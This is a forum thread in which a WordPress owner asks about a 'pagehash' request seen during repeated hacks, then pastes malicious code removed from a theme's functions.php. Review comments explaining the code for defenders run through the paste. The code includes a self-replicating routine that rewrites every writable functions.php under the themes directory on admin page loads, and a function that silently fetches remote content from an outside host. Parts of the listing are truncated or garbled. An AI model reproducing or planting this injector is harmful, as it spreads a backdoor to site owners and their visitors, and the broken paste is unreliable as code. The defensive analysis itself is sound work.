Burglary protection
tem1x, 2014-02-12 17:29:03

What does a request in the logs of a Wordpress site mean?

WordPress sites on this hosting are constantly being hacked. I can't understand the attacker's first request in the logs:
"GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpage=1 HTTP/1.0"
If you put the site's domain in front of this request and load it, the main page opens with the admin panel already logged in.
It is also not clear what kind of hash this is. Is it the password for the admin panel? I think that if the database had been hacked and the password decrypted, the attacker would have logged in through the usual admin login page. Thanks


1 answer(s)
tem1x, 2014-04-17
@tem1x

No, the password was different. I deleted the code below from the theme's functions.php file, although I don't really understand what it does. I'm waiting to see the results. I read on one blog that this is probably the threat:
<?php
/**
 * Self-replication routine of the injected block; it is registered on the
 * "admin_head" hook further down in this listing.
 *
 * NOTE(review): this is a truncated forum paste. The line assigning $ftion is
 * cut off and the assignment of $cont is not visible, so these comments
 * describe only what the surviving lines show.
 *
 * Visible behaviour:
 *  - copies the text of this file from its last opening PHP tag to the end;
 *  - collects target files under the "themes" directory via _getall_widgetcont();
 *  - for each writable target that does not already contain a marker taken
 *    from the copied block, rewrites the target with the block appended.
 *
 * Defender takeaway: removing the block from one theme is not enough. Any other
 * infected file under the same themes directory re-adds it on the next admin
 * page load, so every theme (including inactive ones) has to be checked against
 * a known-good copy, and unexpected modification times on theme files are a
 * useful indicator.
 *
 * @return string $output, which only the filler lines below ever touch.
 */
function _verify_activeatewidgets(){
// $widget = this file's own text from the last opening PHP tag onward, i.e. the block being copied.
// The tag is spelled as a concatenation, so the literal two-character sequence never appears
// inside the block itself (presumably so the search finds the real tag, not this line).
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="" ;$allowed="";
// Filler: strip_tags() on an empty string changes nothing.
$output=strip_tags($output, $allowed);
// Cut this file's directory path just after the first "themes" and walk that directory for targets.
$direst=_getall_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
// Only files the web server user can write are touched; read-only theme files are skipped.
if (is_writable($item)){
// NOTE(review): the next line is truncated in the paste (and "$ widget" carries a stray space).
// It starts extracting a string from $widget beginning at its first "_", presumably the
// first function name, used as an "already infected" marker. TODO confirm on a complete sample.
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($ widget,stripos($widget,"_")),"
// $cont is presumably the target file's current content; its assignment was lost with the line above.
// The marker test makes the write happen once per file.
if (stripos($cont,$ftion) === false){
// Append a closing PHP tag only if the target's last 20 bytes do not already contain one.
$issepar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
// Filler: $before and $after are not defined in this function.
$output .= $before . "Not found" . $after;
// If a closing tag is present near the end, drop whatever follows it.
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
// "w+" truncates the target, then original content + closing tag + copied block are written back.
$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $issepar . "\n" .$widget);fclose($f);
// Filler: $is_showdots and $ellipsis are not defined in this function.
$output .= ($is_showdots && $ellipsis) ? "..." : "";
}
}
}
}
return $output;
}
/**
 * Recursive directory walk that builds the list of files the replication
 * routine will rewrite.
 *
 * $wids is a queue of directories still to visit and $items accumulates the
 * matches. A file matches when its name equals the last 13 characters of this
 * file's own path; "functions.php" is 13 characters long, so when the injected
 * file is a theme's functions.php (as the post describes) every functions.php
 * below the start directory is selected.
 *
 * Returns false as soon as a queued path is missing, is not a directory or is
 * not readable; otherwise returns the accumulated list once the queue is empty.
 *
 * NOTE(review): the function's closing braces are missing from this paste;
 * the listing runs straight on into the next statement.
 */
function _getall_widgetcont($wids,
$items=array()){ $places=array_shift($wids);
// Normalise the path by dropping one trailing slash.
if(substr($places,-1) == "/"){
$places=substr($places,0,-1);
}
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != "." && $elem != ".."){
if (is_dir($places . "/" . $elem)){
// Sub-directories are queued, so the walk covers every theme and nested folder.
$wids[]= $places. "/" . $elem;
} elseif (is_file($places . "/" . $elem)&&
// Same file name as the currently running file.
$elem == substr(__FILE__,-13)){
$items[]=$places . "/" . $elem;}
}
}
}else{
return false;
}
// Keep recursing until the directory queue is drained.
if (sizeof($wids) > 0){
return _getall_widgetcont($wids,$items);
} else {
return $items;
// Compatibility shim: defines stripos() only when the runtime lacks it (the function is
// built in since PHP 5, so on current hosts this branch never runs).
// The fallback lower-cases both strings and delegates to strpos().
if(!function_exists("stripos")){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}
}
// Compatibility shim: defines strripos() (case-insensitive search for the last occurrence)
// only when the runtime lacks it; it is built in since PHP 5.
if(!function_exists("strripos")){
function strripos( $haystack, $needle, $offset = 0 ) {
// A non-string needle is treated as a character code.
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
// Reverse the searched part of the haystack so a forward search finds the last match.
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
}
else{
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );
}
// No match in the reversed string means no match at all.
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
// Convert the position found in the reversed string into a position value for the caller.
$pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );
return $pos;
}
}
// Compatibility shim: defines scandir() only when the runtime lacks it (built in since PHP 5).
// Returns the base names read from $dir through opendir()/readdir().
// NOTE(review): with the default $skipDots=true the condition below is true for every entry,
// so "." and ".." are not filtered by it; and is_dir($file) tests the bare entry name, which
// resolves against the current working directory rather than $dir.
if(!function_exists("scandir")){
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != "." && $file != "..") || $skipDots == true) {
// With $listDirectories=false, entries that is_dir() reports as directories are skipped.
if($listDirectories == false) { if(is_dir($file)) { continue; } }
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}
// Hooks the replication routine to WordPress's "admin_head" action, so it runs whenever an
// admin page is rendered; an administrator visiting the dashboard is what triggers the
// rewrite of the other theme files.
add_action("admin_head", "_verify_activeatewidgets");
/**
 * Function registered on the "init" hook by the statement that follows it.
 *
 * NOTE(review): most of this body was elided ("...") and stripped of HTML when it
 * was pasted. What survives is a run of default assignments and fragments of
 * "more-link" markup, so the real logic cannot be assessed from this page.
 * Because "init" fires on every request, this is the most plausible place for
 * any request-parameter handling (such as the "pagehash" parameter from the
 * question), but nothing visible here confirms that; verify against a complete
 * copy of the file before drawing conclusions.
 */
function _getprepare_widgets(){
// Defaults are set only if the variables are not already defined in this scope.
if(!isset($chars_count)) $chars_count=120;
if(!isset($methods)) $methods="cookie";
// The next line is where the paste elides the body; the tail is leftover link markup.
if(!isset($allowed)) $allowed=" "; if(!isset($f_type)) $f_type="none"; if(!isset... ID) . "#more-" . $post->ID ."\" title=\"" . $more_... " . $tag . ">" . "\n";
} else {
$output .= " <" . $tag . " class=\"more-link\"> ID) . "\"title=\"" . $more_links_title . "\">" . ... " . $tag. ">" . "\n";
}
}
return $output;
}
// Registers _getprepare_widgets() on "init", which WordPress fires on every request,
// front end and admin alike, not only on admin pages.
add_action("init", "_getprepare_widgets");
/**
 * Builds a string listing published posts that have approved comments.
 *
 * Nothing in the visible lines writes files or contacts a remote host.
 *
 * NOTE(review): the closing brace of the `if($duration !="")` block is missing
 * from this paste, and the output line has lost its markup ($permalink and
 * $comment_count are computed but unused), so the listing is incomplete.
 *
 * NOTE(review): $duration is concatenated into the SQL text unescaped. That is
 * only safe while every caller passes a trusted integer; an integer cast or
 * $wpdb->prepare() would remove the dependency on the caller.
 *
 * @param int    $no_posts       Not used in the visible lines.
 * @param string $before         Text placed before each entry.
 * @param string $after          Text placed after each entry.
 * @param bool   $show_pass_post When false, password-protected posts are excluded.
 * @param string $duration       Number of days to look back; "" disables the date filter.
 * @return string
 */
function __popular_posts($no_posts=6, $before="", $after="", $show_pass_post=false, $duration="") {
global $wpdb;
// Query assembled by string concatenation against the posts and comments tables.
$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
if(!$show_pass_post) $request .= " AND post_password =\"\"";
if($duration !="") {
// Raw interpolation of $duration into the query; see the note in the header.
$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " " . $post_title . " " . $after;
}
} else {
$output .= $before . "Not found" . $after;
}
return $output;
}
/**
 * Fetches content from a third-party host, at most once per request.
 *
 * The static counter lets only the first call do any work. That call reads
 * from wpru.ru/aksimet.php with $wp_id appended as the "id" query value and
 * returns whatever the host sends back; later calls return nothing.
 *
 * NOTE(review): the fetch line is truncated in this paste, and the address
 * appears without a scheme and with stray spaces, so the exact request cannot
 * be reconstructed from here. What the caller does with the returned content
 * is not visible either.
 *
 * Defender takeaway: theme code pulling remote content with errors suppressed
 * is worth treating as an indicator. Searching theme and plugin files for this
 * host name, and reviewing outbound requests from the web server, are
 * reasonable follow-ups.
 */
function bloqinfo($wp_id){
static $wp_count = 0;
if($wp_count == 0){
$wp_count++;
// "@" suppresses warnings, so a failed or blocked fetch leaves no trace in the PHP error log.
return @file_get_contents(' wpru.ru/aksimet.php?id= '.$wp_id.
}
}
/**
 * Prepends the current post's medium-size thumbnail to $content when the post has one.
 *
 * NOTE(review): $content is neither a parameter nor declared global in this
 * listing, so it is undefined where it is first read. The two empty string
 * literals presumably held wrapper markup that was stripped when the code was
 * pasted. No hook registration for this function is visible on the page.
 */
function insertThumbnailRSS() {
global $post;
if ( has_post_thumbnail( $post->ID ) ){
$content = '' . get_the_post_thumbnail( $post->ID, 'medium' ) . '' . $content;
}
return $content;
}
